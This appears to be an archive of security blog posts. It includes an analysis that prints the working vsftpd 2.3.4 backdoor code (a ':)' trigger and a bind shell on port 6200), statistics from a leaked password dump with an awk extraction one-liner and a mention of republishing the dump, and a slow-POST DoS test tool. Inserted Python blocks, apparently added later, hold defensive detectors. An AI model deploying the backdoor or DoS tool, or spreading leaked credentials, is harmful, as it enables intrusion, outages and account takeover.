Vsftpd Backdoor Discovered

As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.

The backdoor trigger was planted within ‘str.c’:

else if((p_str->p_buf[i] == 0x3a)       /* ':' */
        && (p_str->p_buf[i+1] == 0x29))  /* ')' */
{
  vsf_sysutil_extra();                  /* opens the bind shell shown below */
}

As you can see, the code searches for bytes 0x3a and 0x29: or ‘:)’ for those who don’t like ASCII.

The vsf_sysutil_extra() function is then inserted into sysdeputil.c as:

int vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  /* Create a TCP socket and bind it to port 6200 on every interface. */
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    exit(1);
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
           sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  /* Accept connections forever; each one has stdin/stdout/stderr
     redirected to the socket, then /bin/sh replaces the process. */
  for(;;)
  {
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0);
  }
}

Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. This simply binds to port 6200 and listens forever, accepting connections and spawning a shell.
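A defender's counterpart to the two artefacts described above (the ‘:)’ trigger in the username and the extra listener on port 6200), as an added example that is not code from this post or from vsftpd. The FTP transcript and netstat lines it scans are constructed, and the "<client> <command>" transcript format is an assumption:

```python
"""Defender-side checks for the vsftpd 2.3.4 backdoor described above.

Added example, not code from the post or from vsftpd. It covers the two artefacts
the post identifies: the ":)" (0x3a 0x29) trigger in the username that str.c looks
for, and the extra listener on port 6200 that vsf_sysutil_extra() opens. All log
and netstat lines below are constructed."""
import re
from typing import List, Tuple

TRIGGER = b"\x3a\x29"    # the adjacent byte pair str.c searches for
BACKDOOR_PORT = 6200     # port hard-coded in vsf_sysutil_extra()

# Constructed FTP control-channel transcript: "<client> <raw command>".
SAMPLE_FTP_LOG = b"""\
10.0.0.5 USER anonymous
10.0.0.5 PASS guest@example.com
10.0.0.9 USER bob:)
10.0.0.7 USER al:ice)
"""

# Constructed `netstat -tlnp`-style output (proto recv send local foreign state pid/prog).
SAMPLE_NETSTAT = """\
tcp 0 0 0.0.0.0:21   0.0.0.0:* LISTEN 1201/vsftpd
tcp 0 0 0.0.0.0:6200 0.0.0.0:* LISTEN 1201/vsftpd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 842/exim4
"""

USER_RE = re.compile(rb"^(\S+) USER (.*)$")

def contains_trigger(arg: bytes) -> bool:
    """Same condition as the str.c loop: 0x3a immediately followed by 0x29, anywhere."""
    return TRIGGER in arg

def trigger_attempts(log: bytes) -> List[Tuple[str, bytes]]:
    """(client, username) for every USER command that would fire the backdoor."""
    hits = []
    for line in log.splitlines():
        m = USER_RE.match(line)
        if m and contains_trigger(m.group(2)):
            hits.append((m.group(1).decode(), m.group(2)))
    return hits

def backdoor_listeners(netstat: str) -> List[str]:
    """Process names holding a LISTEN socket on the backdoor port."""
    found = []
    for line in netstat.splitlines():
        cols = line.split()
        if len(cols) >= 7 and cols[5] == "LISTEN" and cols[3].endswith(f":{BACKDOOR_PORT}"):
            found.append(cols[6])
    return found
```

The last sample line shows why the check is on the adjacent pair and not on the two characters separately: ‘al:ice)’ contains both bytes but never the sequence, so the backdoor would not fire on it.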


LulzSec pron.com Password Dump

Recently there was a post made to Twitter from LulzSec releasing the username / password dump from pron.com (including some rather ‘embarrassing’ email addresses).

The password dump can be found here (It seems that this link is no longer available)

I decided to take a look through the database and see just what passwords people were using:

The statistics are:

25945 total username / password entries

20766 unique passwords

The most common passwords in use were:

123456 – 670 times

123456789 – 212 times

12345 – 111 times

1234 – 75 times

12345678 – 72 times

1234567 – 65 times

password – 62 times

1234567890 – 52 times

123 – 49 times

123123 – 41 times

If you want to parse the text file and dump raw passwords, a little command-line fu’ is all that’s needed:

awk -F "|" "{ print substr(\$2, 2) }"  pronz_with_count.txt

I’ve made a dump of the password file which can be found here
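The same pass over the dump done in Python, as an added example rather than the script used for the figures above. It assumes the file holds one "username | password" entry per line with a space after the pipe (which is what the awk one-liner's substr($2, 2) implies), and the entries it runs on are constructed:

```python
"""Password-dump statistics from a pipe-separated dump.

Added example, not the author's script. It assumes the dump holds one
"username | password" entry per line, with a space after the pipe, which is
what the awk one-liner above (substr($2, 2) drops that space) implies. The
entries below are constructed."""
from collections import Counter
from typing import Dict, List

SAMPLE_DUMP = """\
alice@example.com | 123456
bob@example.com | hunter2
carol@example.com | 123456
dave@example.com | password
erin@example.com | 123456
frank@example.com | 12345
"""

def parse_passwords(text: str) -> List[str]:
    """Python equivalent of the awk one-liner: field 2, minus its leading space."""
    pws = []
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 2:
            continue                     # blank or malformed line
        pws.append(fields[1][1:])
    return pws

def summarise(pws: List[str], top: int = 10) -> Dict[str, object]:
    """The totals and top-N list the post reports, plus the share of
    all-digit passwords (a quick measure of how weak the set is)."""
    counts = Counter(pws)
    return {
        "total": len(pws),
        "unique": len(counts),
        "most_common": counts.most_common(top),
        "digits_only_share": sum(p.isdigit() for p in pws) / len(pws) if pws else 0.0,
    }
```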

Change of Address / New Blog Design

As you may have noticed (I hope :D) I have launched the redesign of my blog. This is to coincide with the new address http://www.xpnsbraindump.com, and was long overdue. My hope is that I can now structure content in a way which is easy to find, and is less random.

I have also moved my social focus to the HAK5 irc channel rather than r00tsecurity. If you are interested in an active IRC channel with a varied array of topics, this is the place.

I would love to hear any opinions on the new design.

LastPass Security Issue

Recently I heard about the LastPass security issue that had been posted on their blog here

First, I should applaud LastPass in their open nature regarding ‘suspected’ security vulnerabilities. I believe that they have dealt with this issue well and in recent times, we all know of the issues that delaying security information can have (ahem *Sony*).

Saying that, today I came to re-install Windows 7 on my laptop, and installed the LastPass Chrome plugin. Trying to authenticate to my twitter account, I came across a problem, so I checked out the LastPass.com website for any updates, and was asked to enter my email address for an activation link to be sent.

It seems from the LastPass blog post that this is a temporary solution to mitigate the high volume of traffic that they were receiving of people resetting passwords.

This pointed out a huge issue for me: How could I log into my email to authenticate my LastPass account, when I couldn’t access LastPass to retrieve my email password?

Of course, there are other ways around this (such as using LastPass Pocket or another locally stored LastPass database), but in a world of Cloud Computing, where Amazon backs up your data, Google stores your blog, LastPass stores your security credentials, PayPal stores your finances, and Flickr stores your family photos, is our reliance on Cloud Computing not as fruitful as first thought?

Gadget Show Live 2011

Today we visited The Gadget Show Live 2011, the UK’s electronics show where big name brands come together to show off their latest wares.
This is the second time that I have been to TGSL, and this year didn’t disappoint.
I must stress, at first glance I was pretty disappointed with the quality of the stands this year. Many seemed to be full of cheap tat that can be found at any local computer market, even Npower made another appearance trying to have people switch their energy suppliers (I mean come on guys, people have better things to do at these events than talk about how much they pay for their energy). Nvidia were supposed to show their Tegra range, but unfortunately I couldn’t find anything about it.
I’m mostly interested in the computer technology at these things, rather than the household electronics (TV’s, DVD players etc), so I spend most of my time in the ‘Game Zone’ drooling over the latest game previews and hardware. Again, it was all pretty standard stuff, Nvidia 3d experience, PC’s draped in neon lighting, an array of scantily clad females, and The Prodigy blaring in the background.
That is until we noticed a sign in the corner.. “Over 18’s Only, ID will be required”. Pulling back the curtains, we found this:

Now for those of you who know me, you will know how much I love Gears Of War. This game isn’t out on Beta release until Monday, so to get to play it 3 days early was HUGE. After queuing for what felt like a lifetime, I managed to get a go on the new Team Deathmatch mode, and I can tell you all that this game doesn’t disappoint. To see some footage of the upcoming game, visit my youtube profile here.
Another surprise we found behind the ‘18s Only’ curtain was this blast from the past:

The Duke Nukem Forever stand had a Beta of the upcoming June release running on an XBox Development Kit on an array of stands which seemed very popular with the crowds. There were some showings of Mortal Kombat which were also very popular. There’s something hugely satisfying about beating your rivals to death with their own arm with Drum and Bass pumping in the background (or is that just me).
So, moral of the story.. if you ever see a curtain marked “Over 18s Only”, you can bet your ass that there is something sweet behind it 😀
Overall verdict of The Gadget Show Live 2011.. brilliant for gamers, but must try harder with consumer tech.

HTTP Gets a New Form Of Attack (Part 2)

Ok, the other day I blogged about the new vulnerability discovered on OWASP regarding an HTTP DoS attack utilising the POST Content-Length and slowly sending data.
Well I finally got a free couple of hours in my schedule so decided to create a very simple tool to test if this really worked. The tool itself can be found at https://github.com/xpn/HTTP-Post-DOS-Tool. No permission is provided for this tool to be used for malicious purposes. I have intentionally given the User-Agent an obvious ID and any unauthorised use can be easily detected in logs with a simple grep of “XPN HTTP DOS Tester”. You have been warned!
By default it spawns 300 threads, all of which send POST data to the HTTP server at a rate of 1 byte per 10 seconds. Almost instantaneously, the test HTTP server I had to hand (an Apache 2.2.13 box with no current traffic) froze with multiple error messages of:
[Thu Nov 25 00:23:57 2010] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 0 idle, and 250 total children
This confirms reports on other blogs about the success of this attack. Once this tool was running I was unable to request any pages from the test HTTP server (via GET or POST).
One thing to bear in mind with this attack is that my test server was only configured for 256 simultaneous connections. Obviously sites will have a lot more than this configured (and multiple HTTP servers), which somewhat removes the realism of this test.
The concerning thing I found is that a single machine is quite capable of crippling a local HTTP server, meaning local Intranet HTTP servers are suddenly very easy prey for a malicious attacker.
Below is a video of this in action.
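As an added example (not part of this post or of the HTTP-Post-DOS-Tool), the two log signals mentioned above turned into a check a server admin can run: the ‘server seems busy’ error-log line with its idle/total child counts, and the tool's deliberate User-Agent marker. Only the first error-log line is the one quoted in the post; the other lines are constructed, the access log is assumed to be in Combined Log Format, and the 256 default is the MaxClients figure from the test above:

```python
"""Spotting the slow-POST condition from Apache logs.

Added example, not part of the original post or of the HTTP-Post-DOS-Tool. It
uses the two defender-side signals the post mentions: the error-log "server
seems busy" message with its idle/total child counts, and the tool's deliberately
obvious User-Agent in the access log. Apart from the first error line (quoted
from the post) every log line below is constructed."""
import re
from typing import List, Optional, Tuple

BUSY_RE = re.compile(
    r"\[(?P<ts>[^\]]+)\] \[info\] server seems busy.*?spawning (?P<spawn>\d+) children, "
    r"there are (?P<idle>\d+) idle, and (?P<total>\d+) total children"
)
UA_MARK = "XPN HTTP DOS Tester"   # the marker the post says to grep for

ERROR_LOG = """\
[Thu Nov 25 00:23:57 2010] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 0 idle, and 250 total children
[Thu Nov 25 00:23:58 2010] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 4 children, there are 0 idle, and 256 total children
[Thu Nov 25 00:24:01 2010] [notice] caught SIGTERM, shutting down
"""

ACCESS_LOG = """\
192.0.2.10 - - [25/Nov/2010:00:22:40 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.77 - - [25/Nov/2010:00:23:50 +0000] "POST /form HTTP/1.1" 408 0 "-" "XPN HTTP DOS Tester"
192.0.2.77 - - [25/Nov/2010:00:23:51 +0000] "POST /form HTTP/1.1" 408 0 "-" "XPN HTTP DOS Tester"
"""

def parse_busy(line: str) -> Optional[Tuple[int, int, int]]:
    """(spawning, idle, total) from a 'server seems busy' line, else None."""
    m = BUSY_RE.search(line)
    return (int(m["spawn"]), int(m["idle"]), int(m["total"])) if m else None

def slot_exhaustion_events(error_log: str, max_clients: int = 256) -> List[str]:
    """Timestamps at which no child was idle and the pool sat within 10% of MaxClients."""
    events = []
    for line in error_log.splitlines():
        m = BUSY_RE.search(line)
        if m and int(m["idle"]) == 0 and int(m["total"]) >= 0.9 * max_clients:
            events.append(m["ts"])
    return events

def tool_clients(access_log: str) -> List[str]:
    """Distinct client addresses whose request carried the tool's User-Agent marker."""
    return sorted({line.split()[0] for line in access_log.splitlines() if UA_MARK in line})
```

Note that a slow POST only reaches the access log once Apache gives up on it (here as a 408), so the error-log child counts are the earlier of the two signals.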